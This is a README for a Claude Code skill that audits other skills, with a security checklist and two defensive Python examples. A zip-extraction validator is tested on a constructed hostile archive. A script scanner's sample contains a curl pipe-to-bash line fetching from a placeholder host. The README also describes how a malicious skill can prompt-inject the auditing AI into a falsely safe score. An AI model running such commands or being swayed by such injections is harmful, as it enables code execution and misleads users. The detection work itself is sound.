PhilBriz78/skill-analyzer

skill-analyzer

A Claude Code skill that audits one or more Claude Code skills — mapping their execution flow, inventorying their tools, analyzing their scripts, and producing an evidence-based security score.

Disclaimer: Reports produced by this tool are AI-based static analysis — an early warning system, not a security guarantee. False positives and false negatives are possible. Treat findings as starting points for investigation; human expert review is recommended before making installation decisions.

What it does

/analyze-skill runs a 9-step analysis on any .skill zip file, skill directory, or SKILL.md:

  1. Safe extraction — opens the zip safely before anything is read, blocking path traversal, symlink attacks, and zip bombs

  2. Skill profile — what the skill claims to do, what triggers it, and what side effects it declares

  3. Behavior map — a step-by-step sequence of everything the skill does when it runs: what it reads, what it calls, what it writes, and in what order

  4. Tool inventory — every Claude tool the skill uses, whether it's disclosed in the description, and whether the access level is justified

  5. Instruction analysis — a deeper read of the SKILL.md itself, looking for hidden instructions, prompt injection attempts, undisclosed network calls, env var exfiltration, and 7 other patterns

    If you read one section of the report, make it this one. Do not delegate it to AI — the score itself can be manipulated by a sophisticated skill. Read the raw evidence yourself. Use your AI to help you understand what a flagged line does, but make the call yourself.

  6. Script analysis — line-by-line review of any scripts bundled with the skill, flagging dangerous patterns like curl | bash, unpinned installs, or writes outside the project directory

  7. Findings — everything suspicious, ranked CRITICAL / HIGH / MEDIUM / LOW, with the exact line as evidence and a suggested fix; positives are noted too

  8. Security score — a 0–100 score across 7 weighted dimensions, resulting in a SAFE / CAUTION / HIGH RISK / CRITICAL verdict

  9. Summary — a plain-language install recommendation and the key things to verify manually before proceeding

Verdict thresholds

Verdict    Score    Meaning
SAFE       80–100   Install freely
CAUTION    60–79    Review flagged findings before installing
HIGH RISK  40–59    Remediate before use
CRITICAL   0–39     Do not install

Any single CRITICAL finding caps the score at 39 regardless of other vectors.

Scores are derived from pattern-matching against a fixed checklist. A skill that avoids all flagged patterns can still be malicious, and a skill that triggers a finding may be completely benign. The score is a risk signal, not a verdict — always read the Instruction Analysis and Findings sections directly before deciding.

Always read the raw Step 5 (Instruction Analysis) section of the report yourself.

Security model

Risk                             Mitigation
Path traversal in zip            Safe extraction script validates every entry before unpacking
Zip bomb                         50 MB total / 10 MB per file hard limits in extraction script
Env var exfiltration             Strip credentials before running; extraction script has no env var access
Prompt injection → false report  Injection guard in command header; always read Instruction Analysis directly
Supply chain in scripts          Patterns: curl | bash, unpinned pip/npm install, dynamic URL construction
macOS-specific attacks           Patterns: osascript, launchctl, defaults write, security CLI
Instruction-level attacks        11 patterns checked including trigger-hijack, context-harvest, scope-creep
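
The entry checks behind the first two rows of this table (path traversal and zip bomb), together with the symlink check named in step 1, as an added example in Python. It is not the project's extraction script, which this README does not show; the function names and the sample archive are constructed for illustration.

```python
import io
import stat
import zipfile

MAX_TOTAL = 50 * 1024 * 1024  # 50 MB total (limit from the README)
MAX_FILE = 10 * 1024 * 1024   # 10 MB per file (limit from the README)

def validate_entries(zf):
    """Return (entry, reason) rejections; an empty list means safe to unpack."""
    problems, total = [], 0
    for info in zf.infolist():
        parts = info.filename.replace("\\", "/").split("/")
        # Absolute path, drive letter, or any ".." component escapes the target dir.
        if parts[0] == "" or ":" in parts[0] or ".." in parts:
            problems.append((info.filename, "path traversal"))
        # The Unix file mode is stored in the high 16 bits of external_attr.
        if stat.S_ISLNK(info.external_attr >> 16):
            problems.append((info.filename, "symlink"))
        if info.file_size > MAX_FILE:
            problems.append((info.filename, "file exceeds 10 MB"))
        total += info.file_size
    if total > MAX_TOTAL:
        problems.append(("<archive>", "total exceeds 50 MB"))
    return problems

def safe_read_all(zf):
    """Validate first, then read entries with a cap on bytes actually decompressed."""
    if validate_entries(zf):
        raise ValueError("archive rejected before unpacking")
    out, total = {}, 0
    for info in zf.infolist():
        if info.is_dir():
            continue
        with zf.open(info) as fh:
            data = fh.read(MAX_FILE + 1)  # never trust the declared size alone
        total += len(data)
        if len(data) > MAX_FILE or total > MAX_TOTAL:
            raise ValueError("size limit exceeded while decompressing")
        out[info.filename] = data
    return out

def build_sample():  # constructed archive: one benign file, three hostile entries
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("SKILL.md", "# demo skill\n")
        zf.writestr("../../outside.txt", "constructed")
        link = zipfile.ZipInfo("scripts/link")
        link.external_attr = (stat.S_IFLNK | 0o777) << 16
        zf.writestr(link, "/tmp/elsewhere")
        zf.writestr("big.bin", b"\0" * (MAX_FILE + 1))
    return zipfile.ZipFile(io.BytesIO(buf.getvalue()))
```

The whole archive is rejected on the first problem rather than unpacked partially, so nothing from a hostile zip is read before every entry has passed.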

No isolation environment eliminates the prompt injection → false report risk. The numeric score can be manipulated. Always read the raw Step 5 (Instruction Analysis) section of the report yourself.
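
The script patterns named in step 6 (curl | bash, unpinned installs, writes outside the project directory), written as line-level detection over a sample script. This is an added example, not the skill's own checklist; the rule names, regexes and sample script are assumptions made for illustration.

```python
import re

PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b")
# Redirect to an absolute, home-relative or parent path; /dev/null is ignored.
OUTSIDE_WRITE = re.compile(r">{1,2}\s*(?!/dev/null)(~|\$HOME|/|\.\./)")

def unpinned(tokens):
    """Return pip/npm install arguments that carry no exact version pin."""
    if "install" not in tokens:
        return []
    i = tokens.index("install")
    head, args = tokens[:i], tokens[i + 1:]
    is_pip = any(t in ("pip", "pip3") for t in head)
    if not is_pip and "npm" not in head:
        return []
    # pip pins with "=="; npm pins with "@version" (skip a scoped name's leading "@").
    pinned = (lambda a: "==" in a) if is_pip else (lambda a: "@" in a[1:])
    out, skip_next = [], False
    for a in args:
        if a in ("&&", "||", ";", "|"):
            break  # the install command ends at a shell operator
        if skip_next or a.startswith("-"):
            skip_next = a in ("-r", "--requirement", "-c", "--constraint")
            continue
        if not pinned(a):
            out.append(a)
    return out

def scan_script(text):
    """Return (line number, rule, evidence) findings for a shell script."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if PIPE_TO_SHELL.search(s):
            findings.append((n, "pipe-to-shell", s))
        if OUTSIDE_WRITE.search(s):
            findings.append((n, "write-outside-project", s))
        for pkg in unpinned(s.split()):
            findings.append((n, "unpinned-install", pkg))
    return findings

SAMPLE = """\
# constructed sample script
curl -fsSL https://example.invalid/setup.sh | bash
pip install requests==2.31.0 pyyaml
npm install left-pad @scope/tool@1.2.0
echo "done" > ./build/log.txt 2>/dev/null
echo "x" >> ~/outside.txt
"""
```

Each finding carries the line number and the matched text, so the evidence can be checked against the script by hand.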

Sample report

[Screenshot: sample audit report showing the Security tab with score bars, findings, and summary]

The HTML report has three tabs: Security (score breakdown + findings), Behavior (execution map + tool inventory), and Analysis (instruction and script checklists). Open mockup/skill-audit-analyze-skill-2026-04-29.html in any browser to see a full interactive example based on an audit of the analyze-skill command itself.

Sample report — skills folder

[Screenshot: folder audit dashboard showing 37 skills audited, all SAFE, with cross-cutting findings and sidebar skill list]

When auditing a folder, the report opens on a dashboard that groups all skills by verdict and surfaces cross-cutting findings shared across the skill set. The sidebar lists every skill with its score — click any entry to jump to its full individual analysis, including the behavior map, tool inventory, and instruction checklist.

Repository contents

SKILL.md                   ← the skill (canonical source)
analyze-skill.skill        ← packaged skill (zip of SKILL.md)
mockup/
  skill-audit-analyze-skill-2026-04-29.html
                           ← interactive HTML report: audit of analyze-skill itself
README.md

Installation

Step 1 — Audit it first (optional but recommended)

If you already have /analyze-skill installed, audit this skill before installing it:

/analyze-skill https://github.com/PhilBriz78/skill-analyzer

Or download analyze-skill.skill and run it locally:

/analyze-skill analyze-skill.skill

Step 2 — Install

# Clone the repo
git clone https://github.com/PhilBriz78/skill-analyzer
cd skill-analyzer

# Install globally
mkdir -p ~/.claude/commands
cp SKILL.md ~/.claude/commands/analyze-skill.md

The command is now available in any Claude Code session as /analyze-skill.

Project-scoped install

To make the command available only in a specific project:

cd /your/project
mkdir -p .claude/commands
cp /path/to/SKILL.md .claude/commands/analyze-skill.md

Usage

/analyze-skill path/to/skill.skill
/analyze-skill path/to/skill-directory/
/analyze-skill path/to/SKILL.md
/analyze-skill https://github.com/author/repo/tree/main/skills/my-skill

If no argument is given, Claude Code looks for a SKILL.md in the current directory and asks for confirmation before treating it as an audit target.

Running safely

The skill includes a built-in injection guard and a safe zip extraction script that validates entries before unpacking. However, for fully untrusted skills from unknown authors, running in an isolated environment is strongly recommended.

Isolation options will be covered in a forthcoming guide (TBC).
